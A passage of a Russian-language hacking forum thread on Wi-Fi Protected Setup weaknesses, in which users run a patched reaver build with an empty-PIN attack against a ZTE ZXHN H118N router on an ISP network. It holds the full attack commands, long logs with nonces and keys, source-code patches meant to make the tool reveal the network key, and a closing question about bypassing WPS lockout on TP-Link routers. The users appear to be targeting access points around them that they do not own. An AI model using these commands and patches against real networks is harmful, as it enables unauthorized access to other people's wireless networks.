Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    Вчера таки скомпилировал с патчем для пустого пина. Испытал на ZTE 118. Не прокатило.
    Сегодня попробую с тикета...
     
    binarymaster and leonid2012lnv like this.
  2. leonid2012lnv

    leonid2012lnv Member

    Joined:
    10 Mar 2017
    Messages:
    24
    Likes Received:
    10
    Reputations:
    0
    значит,наверное и с ZTE 108 не прокатит,месяца 2 в неё стучу,бестолку.с линуксом ещё неопытен поэтому темой заинтересовался,но компилировать самому чёт не получается,всё раньше делал по пошаговым инстр.. Между тем таких точек у нас в местечке всё больше и больше.Новые точки или ZTE 108,или д-линки с выключенным WPS,раньше такого не наблюдалось....Из 3 хендшейков ни один не поддался.Грустно однако.
     
  3. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,442
    Likes Received:
    9,230
    Reputations:
    116
    Чисто ради эксперимента, проверьте в двух вариантах - с опцией -S (--dh-small) и без неё.

    Обратил внимание в последней версии reaver, что некоторые точки перестали вскрываться с опцией -S и посылают так называемый "FAKE nack". Пока не выяснил, это баг в нём, или дело в самих точках.
     
    fffsfs and leonid2012lnv like this.
  4. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    Да, протестирую с разными ключами. reaver'a уже собрал из вашего тикета, вечером буду тестить.
    Странно точка себя ведет. Если не подгонять ее aireplay, прогресс ооочень медленно идет.
    И потом, без ключа -N сплошные таймауты.
    А если подключение все же возможно только с кнопки, то вся эта затея пустая трата времени. Наличие PBC практически сразу airodump показывает.
    На github обсуждалось предположение, что надо указать пин непосредственно через -p и еще ключ -n добавить. Попробую разные варианты.
    Вот еще бы ребутнуть точку, но пока не знаю как. Может кто подскажет? ZTE ZXHN H118N (D4:76:EA: ...)
     
    leonid2012lnv likes this.
  5. leonid2012lnv

    leonid2012lnv Member

    Joined:
    10 Mar 2017
    Messages:
    24
    Likes Received:
    10
    Reputations:
    0
    А какова вероятность что пин по умолчанию? 12345670 ? Пробовал и так и эдак и с вариантами ключей и с сгенерёнными пинами.Вот тут есть немного,что нашёл,но с англ. плохо ,а гугл тот ещё толмач https://www.wifi-libre.com/topic-462-pin-por-defecto-zte-zhxn-h108n-jazztelxxxx-no-sirve.html
     
    #3965 leonid2012lnv, 29 Mar 2017
    Last edited: 29 Mar 2017
  6. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,442
    Likes Received:
    9,230
    Reputations:
    116
    Кстати говоря, именно такие точки в режиме PBC по идее должны быть уязвимы к пустой строке.

    Думаю именно об этом случае упомянул kcdtv в тикете.
     
  7. VasiliyP

    VasiliyP Well-Known Member

    Joined:
    30 Aug 2011
    Messages:
    250
    Likes Received:
    462
    Reputations:
    7
    Покажите кусок лога с информацией для pixiewps. Если, конечно, пакеты M3 приходят.
     
  8. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,442
    Likes Received:
    9,230
    Reputations:
    116
    Тут такое дело... похоже есть баг в reaver. :oops:

    https://github.com/t6x/reaver-wps-fork-t6x/pull/133#issuecomment-290057448
     
  9. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    Опробовал новый пропатченный reaver. Метод с пустым wps pin вроде работает, но пароль не выдает.

    root@kali:~# ./reaver -i wlan0mon -b D4:76:EA:хх:хх:хх -c 6 -v -N -B "" -vvv

    Reaver v1.5.3 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft

    [+] Switching wlan0mon to channel 6
    [?] Restore previous session for D4:76:EA:хх:хх:хх? [n/Y] n
    [+] Waiting for beacon from D4:76:EA:хх:хх:хх
    [+] Associated with D4:76:EA:хх:хх:хх (ESSID: ROSTELECOM-хх)
    [+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
    [+] Trying pin ""
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 8 seconds
    [+] WPS PIN: ''
    [+] Nothing done, nothing to save.
     
    hydra and binarymaster like this.
  10. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,442
    Likes Received:
    9,230
    Reputations:
    116
    Подозрительно частые повторы пакетов, или просто дублирование строк. o_O

    Надо будет потестировать.
     
  11. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    Эти роутеры всегда так реагируют.
    Допустим, что wps pin "". Как теперь его подставить в поле ключа -p ? В коде, видимо, есть контроль введенных данных?
     
  12. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    Результат с добавленным ключом -n

    root@kali:~# ./reaver -i wlan0mon -b D4:76:EA:xx:xx:xx -c 6 -vvv -n -B "" -N

    Reaver v1.5.3 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft

    [+] Switching wlan0mon to channel 6
    [?] Restore previous session for D4:76:EA:xx:xx:xx? [n/Y] n
    [+] Waiting for beacon from D4:76:EA:xx:xx:xx
    [+] Associated with D4:76:EA:xx:xx:xx (ESSID: ROSTELECOM-xx)
    [+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
    [+] Trying pin ""
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 31:29:f7:42:16:02:e0:89:59:43:88:22:27:a7:c0:41
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: ZTE Corporation
    [P] WPS Model Name: ZXHN H118N
    [P] WPS Model Number: ZXHN H118N
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: 4f:b7:04:df:cf:95:85:25:20:f4:de:ef:d7:dc:f3:b6
    [P] PKR: e6:d6:74:ba:c7:d1:df:b1:8b:71:49:c7:2a:6c:c1:21:22:fd:d9:2b:0a:b4:2a:07:87:dc:16:87:6c:be:61:9b:0b:7f:34:58:9f:8d:83:9a:74:d2:f2:f1:5e:b5:d2:10:72:1e:2f:b1:95:2c:c5:d8:ec:69:cd:ce:d0:5d:a7:31:64:9b:88:3e:4c:1d:6d:71:d9:94:a2:bc:3f:38:79:30:34:f5:c9:fa:0b:64:f9:e6:e6:4d:e0:f2:f5:71:35:4f:4d:06:aa:bc:8e:58:bd:96:bf:30:97:f6:4c:48:00:d0:96:59:19:79:cc:32:42:fa:a0:02:61:4a:eb:0e:a8:3c:cf:f8:67:8d:99:4e:cd:dd:44:6e:3f:bc:bb:00:f6:84:5f:78:e4:a6:ab:f3:50:fd:c5:80:4e:57:3c:e3:1f:00:f5:98:ea:ca:8a:6f:c4:67:a4:56:27:e7:fe:62:4c:b6:43:a6:7d:f3:c8:97:85:78:32:4c:8e:04:62:15:7a:56
    [P] AuthKey: d8:49:64:3a:d3:51:c4:6f:d8:33:2e:cd:bf:2e:43:e1:f2:e2:00:4f:1d:d2:fc:92:00:6b:bf:6e:49:c1:34:c0
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin ""
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 23:16:b1:57:61:d7:ba:b9:6e:6f:ae:ae:2d:f8:3a:d0
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: ZTE Corporation
    [P] WPS Model Name: ZXHN H118N
    [P] WPS Model Number: ZXHN H118N
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: de:04:09:0d:3b:fb:26:6a:8e:2c:e0:65:3b:f5:b5:20
    [P] PKR: 83:d0:81:ea:9b:f1:b7:bc:bf:e3:8f:a8:40:bc:7e:94:55:7e:06:f0:11:2a:ec:5c:1a:e9:42:0e:7e:48:e5:ed:4e:05:1e:0c:2c:38:40:2e:9a:8a:8d:81:92:29:5d:6b:56:48:26:5d:13:d1:72:fa:b5:9c:ef:ae:ca:3a:00:d6:ee:ee:cc:28:90:b9:fa:24:ea:87:e4:0c:f5:a6:14:f5:3c:b7:e8:d2:b7:1b:34:42:1b:6f:ef:e5:3a:19:9d:ee:7f:96:17:dd:85:ae:ab:31:b6:79:45:d5:bf:e3:ef:e2:8e:ee:8b:44:8c:99:bf:62:66:0c:8e:90:30:b1:a1:c2:b1:2d:d2:4c:a9:7b:d1:9b:fa:2b:75:23:6a:c6:8c:c5:13:ea:7b:d5:b0:7f:b8:7b:74:95:b9:df:f0:20:7d:7e:40:ef:bc:f0:23:3b:d5:e9:4c:e3:ab:1b:11:e0:ea:e7:75:46:2f:9c:f9:a8:32:49:52:2b:59:60:3b:3b:95:ca
    [P] AuthKey: 4d:33:97:04:b7:e5:22:5f:0a:cb:a6:94:37:22:42:8a:ce:48:be:dd:27:ee:37:3e:2f:50:a5:22:e4:a4:c3:bd
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [P] E-Hash1: a8:ea:2e:06:19:b8:a5:e7:b5:a9:47:8a:2e:ed:5e:20:27:77:38:05:af:23:27:75:74:c8:36:e6:ce:11:a5:d4
    [P] E-Hash2: a8:ea:2e:06:19:b8:a5:e7:b5:a9:47:8a:2e:ed:5e:20:27:77:38:05:af:23:27:75:74:c8:36:e6:ce:11:a5:d4
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 29 seconds
    [+] WPS PIN: ''
    [+] Nothing done, nothing to save.
     
  13. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,442
    Likes Received:
    9,230
    Reputations:
    116
    Я там сейчас обновил pull request, так как rofl0r предложил объединить новую опцию со старой -p.

    Для -p контроль данных есть (был), теперь после нового патча он использует строку.
     
  14. VasiliyP

    VasiliyP Well-Known Member

    Joined:
    30 Aug 2011
    Messages:
    250
    Likes Received:
    462
    Reputations:
    7
    Там точно pin пустой, а почему key не показывает - надо включать более подробный лог - в файле wpa_debug.c
    int wpa_debug_level = MSG_INFO;
    int wpa_debug_show_keys = 0;
    поменять на
    int wpa_debug_level = 0;
    int wpa_debug_show_keys = 1;

    Upd: Похоже, что когда E-Hash1==E-Hash2, то первым делом надо проверять на пустой pin
     
    #3974 VasiliyP, 29 Mar 2017
    Last edited: 29 Mar 2017
    binarymaster likes this.
  15. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin "�p��p�"
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    Ошибка сегментирования
     
    roofless and binarymaster like this.
  16. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,442
    Likes Received:
    9,230
    Reputations:
    116
    Видимо там, где происходит получение строки из get_static_p1(), нужно делать её дубликат, т.е. обернуть в strdup().
    Интересное наблюдение!
     
  17. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    root@kali:~/reaver/src# ./reaver -i wlan0mon -b D4:76:EA:xx:xx:xx -c 6 -vvv -p "" -N

    Reaver v1.5.3 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft

    [+] Switching wlan0mon to channel 6
    [+] Waiting for beacon from D4:76:EA:xx:xx:xx
    [+] Associated with D4:76:EA:xx:xx:xx (ESSID: ROSTELECOM-xx)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    WPS: A new PIN configured (timeout=0)
    WPS: UUID - hexdump(len=16): [NULL]
    WPS: PIN - hexdump_ascii(len=0):
    WPS: Selected registrar information changed
    WPS: Internal Registrar selected (pbc=0)
    WPS: sel_reg_union
    WPS: set_ie
    WPS: cb_set_sel_reg
    WPS: Enter wps_cg_set_sel_reg
    WPS: Leave wps_cg_set_sel_reg early
    WPS: return from wps_selected_registrar_changed
    [+] Trying pin ""
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    WPS: Processing received message (len=539 op_code=4)
    WPS: Received WSC_MSG
    WPS: attr type=0x104a len=1

    .................................

    [+] Received M5 message
    WPS: Processing received message (len=158 op_code=4)
    WPS: Received WSC_MSG
    WPS: attr type=0x104a len=1
    WPS: attr type=0x1022 len=1
    WPS: attr type=0x1039 len=16
    WPS: attr type=0x1018 len=112
    WPS: attr type=0x1005 len=8
    WPS: Parsed WSC_MSG
    WPS: Received M7
    WPS: Unexpected state (12) for receiving M7
    WPS: WPS_CONTINUE, Freeing Last Message
    WPS: WPS_CONTINUE, Saving Last Message
    WPS: returning
    [+] Received M7 message
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    [+] Pin cracked in 15 seconds
    [+] WPS PIN: ''
    [+] Nothing done, nothing to save.
    WPS: Full PIN information revealed and negotiation failed
    WPS: Invalidated PIN for UUID - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 41 44 53 4c 20 4d

    Внес свежие изменения, пересобрал. Пароль не сдает.
     
  18. VasiliyP

    VasiliyP Well-Known Member

    Joined:
    30 Aug 2011
    Messages:
    250
    Likes Received:
    462
    Reputations:
    7
    А попробуйте в файле wps_registrar.c заменить строчку
    if (wps->state != RECV_M7) {
    на
    if (0) {
    Авось поможет. Постоянные повторы принятых пакетов - это может быть и с адаптером связано.
     
  19. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    Попробовал. Без изменений.
     
  20. Elusive

    Elusive New Member

    Joined:
    8 Jan 2011
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Почитал тему, возник вопрос, есть ли решение обойти wps lock на tp link (С0:4A:00)
    При обычном переборе возникает
    Code:
    warning: detected ap rate limiting, waiting 60 seconds before re-checking
    Пробовал mdk3,выдает
    Code:
    mdk3 device seems to be invulnerable
    .
    Если увел время между перебором или еще что-то, толк от этого будет?

    wifislax 4.12. (722n)
     
Loading...